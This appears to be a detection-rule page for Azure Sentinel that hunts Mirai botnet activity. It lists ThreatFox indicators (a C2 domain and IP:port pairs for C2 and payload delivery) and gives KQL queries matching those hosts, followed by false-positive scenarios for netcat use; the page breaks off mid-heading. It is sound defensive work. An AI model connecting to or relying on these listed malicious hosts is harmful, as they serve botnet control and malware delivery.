The ThreatFox: Mirai IOCs rule detects potential Mirai botnet activity by identifying known malicious indicators associated with compromised IoT devices. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate ongoing botnet infections and prevent distributed denial-of-service (DDoS) attacks.
IOC Summary
Malware Family: Mirai Total IOCs: 7 IOC Types: domain, ip:port
| Type | Value | Threat Type | First Seen | Confidence |
|---|---|---|---|---|
| domain | justkiddin.live | botnet_cc | 2026-06-21 | 100% |
| ip:port | 216[.]128[.]153[.]60:51515 | botnet_cc | 2026-06-21 | 100% |
| ip:port | 217[.]60[.]195[.]160:4569 | payload_delivery | 2026-06-21 | 100% |
| ip:port | 217[.]60[.]195[.]160:4568 | payload_delivery | 2026-06-21 | 100% |
| ip:port | 217[.]60[.]195[.]160:9018 | payload_delivery | 2026-06-21 | 100% |
| ip:port | 203[.]154[.]14[.]18:8999 | payload_delivery | 2026-06-21 | 100% |
| ip:port | 203[.]154[.]14[.]18:2049 | payload_delivery | 2026-06-21 | 100% |
// Hunt for network connections to known malicious IPs
// Source: ThreatFox - Mirai
let malicious_ips = dynamic(["217.60.195.160", "203.154.14.18", "216.128.153.60"]);
CommonSecurityLog
| where DestinationIP in (malicious_ips) or SourceIP in (malicious_ips)
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, DeviceAction, Activity
| order by TimeGenerated desc// Hunt in Defender for Endpoint network events
let malicious_ips = dynamic(["217.60.195.160", "203.154.14.18", "216.128.153.60"]);
DeviceNetworkEvents
| where RemoteIP in (malicious_ips)
| project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, ActionType
| order by Timestamp desc// Hunt for DNS queries to known malicious domains
// Source: ThreatFox - Mirai
let malicious_domains = dynamic(["justkiddin.live"]);
DnsEvents
| where Name has_any (malicious_domains)
| project TimeGenerated, Computer, Name, IPAddresses, QueryType
| order by TimeGenerated desc| Sentinel Table | Notes |
|---|---|
CommonSecurityLog | Ensure this data connector is enabled |
DeviceNetworkEvents | Ensure this data connector is enabled |
DnsEvents | Ensure this data connector is enabled |
Scenario: Scheduled System Backup Using nc (Netcat)
Description: A legitimate system backup process uses nc to transfer data over the network.
Filter/Exclusion: Exclude processes where nc is used with backup-related command-line arguments (e.g., nc -z 192.168.1.1 22 for connectivity checks).
Example Filter: process.name = "nc" and process.args contains "backup" or "restore"
Scenario: Admin Task Using nc for Network Diagnostics
Description: An administrator uses nc to test network connectivity or port availability.
Filter/Exclusion: Exclude processes where nc is used with diagnostic flags (e.g., -z, -w, or -v).
Example Filter: process.name = "nc" and process.args contains "-z" or "-w" or "-v"
Scenario: Cron Job Running nc for Log Aggregation
Description: A scheduled cron job uses nc to stream logs to a centralized logging server.
Filter/Exclusion: Exclude processes where nc is used in a cron job with log-related paths or destinations.
Example Filter: process.name = "nc" and process.args contains "/var/log" or "syslog"
Scenario: Docker Container Using nc for Internal Communication
Description: A Docker container uses nc to communicate with another container or service within the same network.
Filter/Exclusion: Exclude processes where nc is used within a Docker container and the source/destination IP is within the container network range.
Example Filter: container_id is not null and source_ip in container_network_range
**Scenario: Security Tool Using nc for Vulnerability Sc